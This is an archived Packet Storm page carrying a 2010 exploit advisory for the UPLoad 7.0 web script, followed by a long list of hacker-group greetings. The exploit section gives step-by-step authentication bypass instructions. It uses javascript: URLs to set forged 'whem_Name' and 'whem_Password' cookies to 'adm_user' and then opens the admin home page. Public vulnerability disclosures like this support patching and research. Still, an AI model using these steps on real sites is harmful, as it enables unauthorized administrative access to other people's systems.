Twenty Year Anniversary

UPLoad 7.0 Insecure Cookie Handling

UPLoad 7.0 Insecure Cookie Handling
Posted Feb 16, 2010
Authored by indoushka

UPLoad version 7.0 suffers from an insecure cookie handling vulnerability.

tags | exploit, insecure cookie handling
MD5 | 9d10afc9f8b0549947f289bea66aaabe

UPLoad 7.0 Insecure Cookie Handling

Change Mirror Download
========================================================================================                  
| # Title : [whem]-UPLoad - v 7.0 Insecure Cookie Handling Vulnerability
| # Author : indoushka
| # email : indoushka@dgsn.dz
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
| # Web Site : http://wh-em.com/d3m-7r/showthread.php?p=49
| # Script : [whem]-UPLoad - v 7.0
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
| # Bug : Insecure Cookie Handling Vulnerability
====================== Exploit By indoushka =================================
# Exploit :

1- http://127.0.0.1/upload/upload/admin/

2- javascript:document.cookie="whem_Name=adm_user;path=/";

3- javascript:document.cookie="whem_Password=adm_user;path=/";

4- http://127.0.0.1/upload/upload/admin/home.php

tested in IE6 + Opera V.10.10

================================ Dz-Ghost Team ======================================================
Greetz : ÔßÑÇ áÓßÇä æáÇíÉ ÓíÏí ÈáÚÈÇÓ 22 + äÇÓ ãÚÓßÑ + äÇÓ ÊíÇÑÊ + äÇÓ ÇáÌáÝÉ + äÇÓ ÇáãÓíáÉ
+ äÇÓ ÊáãÓÇä + äÇÓ äÏÑæãÉ +äÇÓ ãÛäíÉ + äÇÓ æÌÏÉ +äÇÓ ÃÛÇÏíÑ + äÇÓ ÝÇÓ æãßäÇÓ + äÇÓ æåÑÇä

Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.albasrah-forums.com * www.amman-dj.com * www.forums.ibb7.com * www.maker-sat.com * www.owned-m.com
www.vb.7lanet.com * www.3kalam.com * Stake (v4-team.com) * www.3kalam.com * www.dev-chat.com
www.al7ra.com * Cyb3r IntRue (avengers team) * www.securityreason.com * www.packetstormsecurity.org
www.sazcart.com * www.best-sec.net * www.app.feeddigest.com * www.forum.brg8.com * www.zone-h.net
www.m-y.cc * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.gem-flash.com * www.soqor.org
www.h4ckf0ru.com * www.bawassil.com * www.host4ll.com * www.hacker-top.com * www.xp10.me
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com)
SoldierOfAllah (www.m4r0c-s3curity.cc)www.arhack.net * www.google.com * www.np-alm7bh.com
www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.net * www.syrcafe.com
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com
r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir
www.mormoroth.net * www.securitywall.org * www.sec-code.com *
----------------------------------------------------------------------------------------------------------

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    10 Files
  • 2
    Nov 2nd
    15 Files
  • 3
    Nov 3rd
    2 Files
  • 4
    Nov 4th
    2 Files
  • 5
    Nov 5th
    32 Files
  • 6
    Nov 6th
    27 Files
  • 7
    Nov 7th
    8 Files
  • 8
    Nov 8th
    9 Files
  • 9
    Nov 9th
    17 Files
  • 10
    Nov 10th
    2 Files
  • 11
    Nov 11th
    2 Files
  • 12
    Nov 12th
    33 Files
  • 13
    Nov 13th
    29 Files
  • 14
    Nov 14th
    23 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close